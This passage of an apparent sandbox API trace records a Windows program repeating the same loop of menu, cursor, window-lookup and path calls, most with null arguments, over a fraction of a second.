hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.129] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.129] GetStockObject (i=6) returned 0x1b00018 [0176.129] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.129] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.129] PathFileExistsW (pszPath=0x0) returned 0 [0176.129] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.129] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.129] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.129] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.129] GetMenu (hWnd=0x0) returned 0x0 [0176.129] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.129] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.129] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.129] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.129] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.129] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.129] GetStockObject (i=6) returned 0x1b00018 [0176.129] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.129] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.129] PathFileExistsW (pszPath=0x0) returned 0 [0176.129] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.129] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.129] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.129] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.129] GetMenu (hWnd=0x0) returned 0x0 [0176.129] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.130] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.130] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.130] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.130] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.130] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.130] GetStockObject (i=6) returned 0x1b00018 [0176.130] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.130] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.130] PathFileExistsW (pszPath=0x0) returned 0 [0176.130] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.130] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.130] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.130] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.130] GetMenu (hWnd=0x0) returned 0x0 [0176.130] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4c7) returned -1 [0176.130] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.130] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.130] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.130] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.130] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.130] GetStockObject (i=6) returned 0x1b00018 [0176.130] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.130] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.130] PathFileExistsW (pszPath=0x0) returned 0 [0176.130] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.130] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.130] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.130] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.130] GetMenu (hWnd=0x0) returned 0x0 [0176.130] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.130] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.130] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.130] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.130] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.130] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.131] GetStockObject (i=6) returned 0x1b00018 [0176.131] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.131] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.131] PathFileExistsW (pszPath=0x0) returned 0 [0176.131] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.131] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.131] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.131] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.131] GetMenu (hWnd=0x0) returned 0x0 [0176.131] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.131] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.131] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.131] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.131] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.131] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.131] GetStockObject (i=6) returned 0x1b00018 [0176.131] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.131] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.131] PathFileExistsW (pszPath=0x0) returned 0 [0176.131] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.131] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.131] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.131] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.131] GetMenu (hWnd=0x0) returned 0x0 [0176.131] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.131] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.131] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.131] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.131] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.131] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.131] GetStockObject (i=6) returned 0x1b00018 [0176.131] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.131] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.132] PathFileExistsW (pszPath=0x0) returned 0 [0176.132] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.132] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.132] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.132] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.132] GetMenu (hWnd=0x0) returned 0x0 [0176.132] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.132] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.132] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.132] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.132] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.132] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.132] GetStockObject (i=6) returned 0x1b00018 [0176.132] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.132] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.132] PathFileExistsW (pszPath=0x0) returned 0 [0176.132] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.132] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.132] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.132] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.132] GetMenu (hWnd=0x0) returned 0x0 [0176.132] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x286) returned -1 [0176.132] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.132] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.132] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.132] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.132] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.132] GetStockObject (i=6) returned 0x1b00018 [0176.132] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.132] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.132] PathFileExistsW (pszPath=0x0) returned 0 [0176.132] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.132] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.132] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.133] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.133] GetMenu (hWnd=0x0) returned 0x0 [0176.133] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.133] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.133] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.133] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.133] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.133] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.133] GetStockObject (i=6) returned 0x1b00018 [0176.133] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.133] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.133] PathFileExistsW (pszPath=0x0) returned 0 [0176.133] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.133] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.133] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.133] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.133] GetMenu (hWnd=0x0) returned 0x0 [0176.133] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.133] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.133] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.133] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.133] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.133] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.133] GetStockObject (i=6) returned 0x1b00018 [0176.133] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.133] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.133] PathFileExistsW (pszPath=0x0) returned 0 [0176.133] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.133] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.133] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.133] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.133] GetMenu (hWnd=0x0) returned 0x0 [0176.133] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.133] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.134] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.134] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.134] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.134] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.134] GetStockObject (i=6) returned 0x1b00018 [0176.134] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.134] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.134] PathFileExistsW (pszPath=0x0) returned 0 [0176.134] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.134] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.134] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.134] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.134] GetMenu (hWnd=0x0) returned 0x0 [0176.134] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.304] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.304] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.304] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.304] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.304] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.304] GetStockObject (i=6) returned 0x1b00018 [0176.304] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.304] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.304] PathFileExistsW (pszPath=0x0) returned 0 [0176.304] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.304] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.305] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.305] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.305] GetMenu (hWnd=0x0) returned 0x0 [0176.305] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3a7) returned -1 [0176.305] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.305] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.305] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.305] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.305] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.305] GetStockObject (i=6) returned 0x1b00018 [0176.305] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.305] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.305] PathFileExistsW (pszPath=0x0) returned 0 [0176.305] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.305] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.305] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.305] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.305] GetMenu (hWnd=0x0) returned 0x0 [0176.305] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.305] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.305] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.305] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.305] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.305] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.305] GetStockObject (i=6) returned 0x1b00018 [0176.305] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.305] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.305] PathFileExistsW (pszPath=0x0) returned 0 [0176.305] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.305] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.305] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.305] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.305] GetMenu (hWnd=0x0) returned 0x0 [0176.306] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.306] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.306] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.306] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.306] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.306] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.306] GetStockObject (i=6) returned 0x1b00018 [0176.306] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.306] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.306] PathFileExistsW (pszPath=0x0) returned 0 [0176.306] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.306] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.306] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.306] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.306] GetMenu (hWnd=0x0) returned 0x0 [0176.306] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.306] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.306] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.306] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.306] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.306] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.306] GetStockObject (i=6) returned 0x1b00018 [0176.306] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.306] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.306] PathFileExistsW (pszPath=0x0) returned 0 [0176.306] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.306] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.306] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.306] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.306] GetMenu (hWnd=0x0) returned 0x0 [0176.306] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.306] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.306] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.306] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.307] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.307] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.307] GetStockObject (i=6) returned 0x1b00018 [0176.307] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.307] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.307] PathFileExistsW (pszPath=0x0) returned 0 [0176.307] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.307] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.307] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.307] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.307] GetMenu (hWnd=0x0) returned 0x0 [0176.307] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3f5) returned -1 [0176.307] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.307] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.307] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.307] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.307] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.307] GetStockObject (i=6) returned 0x1b00018 [0176.307] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.307] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.307] PathFileExistsW (pszPath=0x0) returned 0 [0176.307] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.307] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.307] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.307] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.307] GetMenu (hWnd=0x0) returned 0x0 [0176.307] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.307] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.307] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.307] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.307] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.307] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.307] GetStockObject (i=6) returned 0x1b00018 [0176.307] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.308] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.308] PathFileExistsW (pszPath=0x0) returned 0 [0176.308] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.308] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.308] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.308] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.308] GetMenu (hWnd=0x0) returned 0x0 [0176.308] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 